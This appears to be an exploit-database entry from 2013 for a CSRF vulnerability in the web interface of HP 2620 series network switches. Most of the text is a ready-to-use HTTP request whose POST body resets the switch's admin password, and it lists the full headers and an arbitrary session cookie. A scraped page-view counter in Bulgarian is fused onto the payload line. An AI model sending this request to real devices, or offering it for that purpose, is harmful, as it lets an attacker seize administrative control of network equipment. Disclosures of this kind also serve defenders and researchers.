# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability # Date: 26.09.2013r. # Exploit Author: Hubert GrÄ…dek (PL) # Software Link: [download link if available] # Tested on: HP-E2620 24-PoEP // RA.15.05.0006,ROMRA.15.10 HTTP Headers: http://[IP_ADDR]/html/json.html Host: [IP_ADDR] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://[IP_ADDR]/html/nhome.html Cookie: sessionId=ANYTHING Connection: keep-alive Pragma: no-cache Cache-Control: no-cache POST Content: method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=ManagerБрой прочитания на тази страница: 986
Hewlett-Packard 2620 Switch Series. Edit Admin Account – CSRF Vulnerability